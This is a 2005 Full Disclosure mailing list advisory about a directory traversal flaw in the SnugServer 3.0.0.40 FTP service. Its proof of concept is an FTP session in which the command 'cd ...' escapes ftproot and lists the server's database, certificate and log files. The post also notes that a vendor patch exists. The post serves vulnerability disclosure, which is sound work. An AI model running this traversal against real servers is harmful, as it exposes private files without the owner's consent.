Full Disclosure mailing list archives
Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service
From: <muts () zahav net il>
Date: Thu, 27 Jan 2005 17:37:41 +0200
See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application. Upload and download files to/from the Internet. Unique firewall file system where your FTP files can be stored in a data file to prevent internal network hacker attacks.

Product Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in the SnugServer 3.0.0.40 FTP Service which allows access to the server filesystem outside of ftproot.

[-] PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220- Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): muts () default com
331 Password required for muts () default com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>

[-] Patch

The vendor has been notified, and an update is available at:
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html